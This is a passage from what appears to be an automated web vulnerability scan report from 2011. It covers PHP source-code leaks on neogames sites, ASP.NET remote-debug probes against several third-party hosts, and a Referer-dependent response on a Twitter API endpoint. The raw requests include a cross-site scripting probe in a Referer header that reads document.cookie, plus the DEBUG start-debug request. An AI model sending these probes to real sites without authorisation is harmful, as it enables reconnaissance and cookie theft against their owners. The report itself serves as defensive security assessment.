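                      "cause": "file not executed by the ASP/JSP engine"})
    return leaks


# Constructed sample bodies. SAMPLE_PHP copies the shape of the WordPress
# theme leak in the report; SAMPLE_CLEAN checks the XML declaration is not
# mistaken for code.
SAMPLE_PHP = """<html><body><div></div>
<?php// comments_template(); // Get wp-comments.php template ?>
<?php// posts_nav_link(' &#8212; ', __('&laquo; Newer Posts'), __('Older Posts &raquo;')); ?>
</td></body></html>"""
SAMPLE_ASP = '<html><body><%= Request.QueryString("id") %></body></html>'
SAMPLE_CLEAN = '<?xml version="1.0"?><html><body><p>no code here</p></body></html>'

if __name__ == "__main__":
    for name, body in [("php", SAMPLE_PHP), ("asp", SAMPLE_ASP), ("clean", SAMPLE_CLEAN)]:
        for leak in find_leaks(body):
            print(name, leak["lang"], leak["fragment"][:60], "->", leak["cause"])
```

The match is deliberately loose, which is why the report rates these findings Tentative: a page that legitimately displays template syntax (an ERB or JSP tutorial, say) will trigger it, and a reviewer still has to confirm that the fragment is the server's own code rather than content. The triage string is only a starting point; the definitive answer comes from the file on the server.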


14.1. http://neogames-tech.com/

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://neogames-tech.com
Path:   /

Issue detail

The application appears to disclose some server-side source code written in PHP. The fragments in the response body are two commented-out WordPress template calls, comments_template() and posts_nav_link(), that were sent to the client verbatim: PHP only recognises <?php as an open tag when it is followed by whitespace, so the interpreter treats <?php// and everything up to the matching ?> as inline HTML. Little code is exposed, but the leak confirms that the site is WordPress running under PHP on IIS 6.0 (consistent with the X-Pingback header) and that the affected theme file contains the same typo on every page that includes it, as the following instances show.

Request

GET / HTTP/1.1
Host: neogames-tech.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 11483
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Date: Mon, 16 May 2011 11:38:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>


<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' &#8212; ', __('&laquo; Newer Posts'), __('Older Posts &raquo;')); ?>


                       </td>
...[SNIP]...

14.2. http://neogames-tech.com/careers

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://neogames-tech.com
Path:   /careers

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /careers HTTP/1.1
Host: neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; __utmb=250931097.3.10.1305545979;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 7076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>


<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' &#8212; ', __('&laquo; Newer Posts'), __('Older Posts &raquo;')); ?>


                       </td>
...[SNIP]...

14.3. http://neogames-tech.com/contact-us

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://neogames-tech.com
Path:   /contact-us

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /contact-us HTTP/1.1
Host: neogames-tech.com
Proxy-Connection: keep-alive
Referer: http://neogames-tech.com/corporate/gaming-license
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; __utmb=250931097.3.10.1305545979

Response

HTTP/1.1 200 OK
Content-Length: 7505
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Date: Mon, 16 May 2011 11:39:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>


<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' &#8212; ', __('&laquo; Newer Posts'), __('Older Posts &raquo;')); ?>


                       </td>
...[SNIP]...

14.4. http://neogames-tech.com/corporate

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://neogames-tech.com
Path:   /corporate

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /corporate HTTP/1.1
Host: neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; __utmb=250931097.3.10.1305545979;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 7392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>


<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' &#8212; ', __('&laquo; Newer Posts'), __('Older Posts &raquo;')); ?>


                       </td>
...[SNIP]...

14.5. http://neogames-tech.com/corporate/gaming-license

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://neogames-tech.com
Path:   /corporate/gaming-license

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /corporate/gaming-license HTTP/1.1
Host: neogames-tech.com
Proxy-Connection: keep-alive
Referer: http://neogames-tech.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; __utmb=250931097.2.10.1305545979

Response

HTTP/1.1 200 OK
Content-Length: 6775
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Date: Mon, 16 May 2011 11:39:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>


<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' &#8212; ', __('&laquo; Newer Posts'), __('Older Posts &raquo;')); ?>


                       </td>
...[SNIP]...

14.6. http://neogames-tech.com/products

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://neogames-tech.com
Path:   /products

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /products HTTP/1.1
Host: neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; __utmb=250931097.3.10.1305545979;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 9094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>


<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' &#8212; ', __('&laquo; Newer Posts'), __('Older Posts &raquo;')); ?>


                       </td>
...[SNIP]...

14.7. http://www.neogames.com/

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.neogames.com
Path:   /

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET / HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 11397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>


<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' &#8212; ', __('&laquo; Newer Posts'), __('Older Posts &raquo;')); ?>


                       </td>
...[SNIP]...

14.8. http://www.neogames.com/contact-us

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.neogames.com
Path:   /contact-us

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /contact-us HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 7505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>


<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' &#8212; ', __('&laquo; Newer Posts'), __('Older Posts &raquo;')); ?>


                       </td>
...[SNIP]...

14.9. http://www.neogames.com/corporate

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.neogames.com
Path:   /corporate

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /corporate HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:16:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 7306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>


<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' &#8212; ', __('&laquo; Newer Posts'), __('Older Posts &raquo;')); ?>


                       </td>
...[SNIP]...

14.10. http://www.neogames.com/news-and-events/january-2011-neogames-sign-a-deal-with-interwetten-group

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.neogames.com
Path:   /news-and-events/january-2011-neogames-sign-a-deal-with-interwetten-group

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /news-and-events/january-2011-neogames-sign-a-deal-with-interwetten-group HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 12294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>


<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' &#8212; ', __('&laquo; Newer Posts'), __('Older Posts &raquo;')); ?>


                       </td>
...[SNIP]...

14.11. http://www.neogames.com/news-and-events/neogames-launches-38-games-in-2010

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.neogames.com
Path:   /news-and-events/neogames-launches-38-games-in-2010

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /news-and-events/neogames-launches-38-games-in-2010 HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 9535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>


<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' &#8212; ', __('&laquo; Newer Posts'), __('Older Posts &raquo;')); ?>


                       </td>
...[SNIP]...

14.12. http://www.neogames.com/our-partners

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.neogames.com
Path:   /our-partners

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /our-partners HTTP/1.1
Host: www.neogames.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305548318.2; __utmc=120915991; __utmb=120915991.2.10.1305548318

Response

HTTP/1.1 200 OK
Content-Length: 32146
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Date: Mon, 16 May 2011 12:45:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>


<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' &#8212; ', __('&laquo; Newer Posts'), __('Older Posts &raquo;')); ?>


                       </td>
...[SNIP]...

14.13. http://www.neogames.com/products

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.neogames.com
Path:   /products

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /products HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:16:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 9094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>


<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' &#8212; ', __('&laquo; Newer Posts'), __('Older Posts &raquo;')); ?>


                       </td>
...[SNIP]...

15. ASP.NET debugging enabled
There are 3 instances of this issue:

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that the debug attribute in the <compilation> element has not been set to "true" within the Machine.config file as well.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.



15.1. http://affiliates.interwetten.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://affiliates.interwetten.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: affiliates.interwetten.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 16 May 2011 12:20:11 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39
Set-Cookie: BIGipServerPool_affiliates.interwetten.com=1727730092.20480.0000; path=/

Debug access denied to '/Default.aspx'.

15.2. http://www.gamblingtherapy.org/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gamblingtherapy.org
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.gamblingtherapy.org
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 16 May 2011 12:20:23 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

15.3. http://www.paypoint.co.uk/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.paypoint.co.uk
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.paypoint.co.uk
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 16 May 2011 12:13:44 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16. Referer-dependent response
There are 5 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.



16.1. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/Metacafe/lists/metacafe/statuses.json

Request 1

GET /1/Metacafe/lists/metacafe/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1305550175438=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; guest_id=130530556419951159; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305550176-17470-26551
X-RateLimit-Limit: 150
ETag: "e5d1cb505007380f6115cd2151534fc1"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 12:49:36 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.04505
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114be3e990c
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 13f34ed7cc97704ba4dad483c845028cdf545995
X-RateLimit-Reset: 1305553776
Set-Cookie: original_referer=ZLhHHTiegr%2BuELNlzhqsTmXCAErbgtcXGmlVl75vKClzAZioSrWmX1f0QknK5wh8oE41IPFgvC8H5lwFMcpBvsbGUrM2CLCfSyyLTsrrntY99PQJLtdZtZXzC2SKRGyfMlLDL2xkw2ifyAgy%2BYKs1A%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCbC2vgvAToHaWQiJTU3YWEwODgzYzhmNDJk%250AZWNjODAyY2IxOWMyZDIzYzEzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--bb094e11ffa55fe4d38d2f1900f6149571445d42; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 35019

TWTR.Widget.receiveCallback_1([{"retweet_count":0,"in_reply_to_status_id":null,"text":"Raised in the circus, perpetually homeless, and always fabulous, meet one of pop's most dynamic rising stars. http:\/\/bit.ly\/j8cAY7","created_at":"Sat May 14 20:32:18 +0000 2011","in_reply_to_screen_name":null,"in_reply_to_status_id_str":null,"contributors":null,"retweeted":false,"in_reply_to_user_id_str":null,"source":"\u003Ca href=\"http:\/\/www.tweetdeck.com\" rel=\"nofollow\"\u003ETweetDeck\u003C\/a\u003E","id_str":"69500306433642497","place":null,"coordinates":null,"geo":null,"in_reply_to_user_id":null,"truncated":false,"user":{"show_all_inline_media":false,"geo_enabled":false,"notifications":null,"created_at":"Tue Nov 23 21:57:17 +0000 2010","profile_sidebar_border_color":"C0DEED","contributors_enabled":false,"following":null,"description":"Metacafe Music is your home for music videos from your favorite artists, with a special focus on independent bands, live events, and interactive content.","profile_use_background_image":true,"profile_image_url":"http:\/\/a2.twimg.com\/profile_images\/1174206695\/Metacafe_Music_Thumb_normal.png","default_profile_image":false,"statuses_count":460,"verified":false,"profile_background_color":"C0DEED","profile_background_image_url":"http:\/\/a3.twimg.com\/images\/themes\/theme1\/bg.png","favourites_count":0,"friends_count":137,"screen_name":"metacafemusic","id_str":"219083877","default_profile":true,"follo
...[SNIP]...

Request 2

GET /1/Metacafe/lists/metacafe/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1305550175438=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; guest_id=130530556419951159; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305550187-30836-50404
X-RateLimit-Limit: 150
ETag: "e5d1cb505007380f6115cd2151534fc1"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 12:49:47 GMT
X-RateLimit-Remaining: 122
X-Runtime: 0.04374
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114be3e990c
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 7bbea65832b5e58416f2db38beeb5a39aef7fe10
X-RateLimit-Reset: 1305553776
